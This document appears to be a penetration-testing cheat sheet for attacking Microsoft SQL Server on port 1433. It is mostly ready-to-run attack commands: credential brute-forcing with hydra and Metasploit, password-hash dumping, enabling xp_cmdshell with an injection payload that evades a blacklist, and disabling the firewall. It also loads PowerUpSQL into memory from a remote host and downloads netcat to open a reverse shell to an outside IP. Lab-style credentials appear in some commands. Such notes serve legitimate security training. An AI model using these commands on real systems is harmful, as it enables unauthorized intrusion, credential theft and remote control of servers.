1433 - MSSQL

MSSQL - Microsoft SQL service. typically runs on TCP port 1433 & Hidden mode port - 2433

Enumeration

//NMAP - enumerate the server, version and info
nmap [IP]
nmap --script ms-sql-info -p 1433 [IP]
nmap -p 1433 --script ms-sql-ntlm-info --script-args mssql.instance-port=1433 [IP]

//Metasploit - enumerate mssql info
use auxiliary/admin/mssql/mssql_enum
set RHOSTS [IP]
exploit

mssql_exec

The mssql_exec admin module takes advantage of the xp_cmdshell stored procedure to execute commands on the remote system. If you have acquired or guessed MSSQL admin credentials, this can be a very useful module.

msf auxiliary(mssql_exec) > set CMD netsh firewall set opmode disable

Enumerate SQL login accounts

// Metasploit - enumerate sql login accounts
use auxiliary/admin/mssql/mssql_enum_sql_logins
set RHOSTS [IP]
exploit

Enumerate domain accounts

//metasploit
use auxiliary/admin/mssql/mssql_enum_domain_accounts
set RHOSTS [IP]
exploit

PowerUpSQL

PowerUpSQL: A PowerShell Toolkit for Attacking SQL Server

Link: https://github.com/NetSPI/PowerUpSQL

Example:

PS /opt/PowerUpSQL> Import-Module .\PowerUpSQL.psd1  
PS /opt/PowerUpSQL> Get-SQLInstanceDomain -Verbose 

ComputerName     : sql01.HTB.local
Instance         : sql01.HTB.local,1433
DomainAccountSid : 1500000521000221246588323062601712516458121134400
DomainAccount    : MSSQLSERVER$
DomainAccountCn  : MSSQLSERVER
Service          : MSSQLSvc
Spn              : MSSQLSvc/sql01.HTB.local
LastLogon        : 13/01/2021 02:56
Description      : 

PS /opt/PowerUpSQL> Get-SQLInstanceDomain | Get-SQLConnectionTest

ComputerName          Instance                   Status        
------------          --------                   ------        
sql01.HTB.local       sql01.HTB.local,1433       Accessible     

Or load into memory

IEX(New-Object System.Net.WebClient).DownloadString("http://192.168.0.1/PowerUpSQL.ps1")

Password attack

nmap -p 1433 --script ms-sql-brute --script-args userdb=/root/Desktop/wordlist/common_users.txt,passwd=/root/Desktop/wordlist/100-common-passwords.txt [IP]
hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt [IP] mssql
hydra -l sa –P /root/Desktop/pass.txt [IP] mssql

##Metasploit:
use auxiliary/scanner/mssql/mssql_login
msf auxiliary(scanner/mssql/mssql_login) > set rhosts [IP]
msf auxiliary(scanner/mssql/mssql_login) > set user_file /root/Desktop/user.txt
msf auxiliary(scanner/mssql/mssql_login) > set pass_file /root/Desktop/pass.txt
msf auxiliary(scanner/mssql/mssql_login) > set stop_on_success true
msf auxiliary(scanner/mssql/mssql_login) > run

Extracting users

nmap -p 1433 --script ms-sql-query --script-args mssql.username=admin,mssql.password=Password123,ms-sql-query.query="SELECT * FROM master..syslogins" [IP] -oN output.txt

Dump hashes

nmap -p 1433 --script ms-sql-dump-hashes --script-args mssql.username=admin,mssql.password=Password123 [IP]

CMD Shell

nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=admin,mssql.password=Password123,ms-sql-xp-cmdshell.cmd="ipconfig" [IP]

Enable xp_cmdshell - manual

//this enables xp_cmdshell
sp_configure 'xp_cmdshell', '1'
RECONFIGURE

//Quickly check what the service account is via xp_cmdshell
EXEC master..xp_cmdshell 'whoami'

//Bypass blackisted "EXEC xp_cmdshell"
‘; DECLARE @x AS VARCHAR(100)=’xp_cmdshell’; EXEC @x ‘ping k7s3rpqn8ti91kvy0h44pre35ublza.burpcollaborator.net’ —impacket-mssqlclient machine_name/user@[IP] -windows-auth

Metasploit

// Suse auxiliary/admin/mssql/mssql_exec
set RHOSTS [IP]
set CMD whoami
exploit

Connecting to MSSQL

Connect using one of the following options:

sqsh

sqsh -S someserver -U sa -P password

metasploit

metasploit (mssql_login)

msf auxiliary(mssql_login) > use auxiliary/scanner/mssql/mssql_login

mssqclient

Impacket script mssqclient

mssqlclient.py reporting:'PcwTWTHRwryjc$c6'@10.10.10.125 -windows-auth

sqlcmd

sqlcmd. To use SQL Server Authentication, you must specify a user name and password by using the -U and -P options.

sqlcmd -S [IP] -U admin -P Password123
    1> select @@version
    2> go
sqlcmd -y0 -d ADSync -Q "EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;"

crackmapexec

cme mssql 10.10.10.52 -u james -p 'J@m3s_P@ssW0rd!'

Using MSSQL-CLI Python utility

python3 -m mssqlcli.main -S [IP] -U sa -P Password123

Common SQL Queries

select @@version;
select loginname from syslogins where sysadmin = 1;
select name from sys.databases;
select * from sysusers;
select name, password_hash FROM master.sys.sql_logins;
SELECT name, CONVERT(INT, ISNULL(value, value_in_use)) AS IsConfigured FROM sys.configurations WHERE name = 'xp_cmdshell';
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;exec SP_CONFIGURE 'xp_cmdshell', 1;RECONFIGURE
EXEC xp_cmdshell "whoami"
EXEC xp_cmdshell "dir C:\"
EXEC xp_cmdshell "type C:\file.txt"

Reverse shell

Download a netcat file to the remote server

SQL> xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; wget
http://10.10.14.9/nc64.exe -outfile nc64.exe"

SQL> xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; .\nc64.exe -e cmd.exe
10.10.14.9 443"

MSSQL 2003 commands

MSSQL 2017 Commands

Current user’s permissions:

SQL> SELECT * FROM fn_my_permissions(NULL, 'SERVER'); 
entity_name    subentity_name    permission_name 
------------   ---------------   ------------------ 
server                           CONNECT SQL 
server                           VIEW ANY DATABASE

Check out the databases available:

SQL> SELECT name FROM master.sys.databases 
name 
----------- 
master 
tempdb 
model 
msdb 
volume 

I can look for user generated tables on those databases:

SQL> use volume 
[*] ENVCHANGE(DATABASE): Old Value: volume, New Value: volume 
[*] INFO(QUERIER): Line 1: Changed database context to 'volume'. 
SQL> SELECT name FROM sysobjects WHERE xtype = 'U' 
name 
------------

Last updated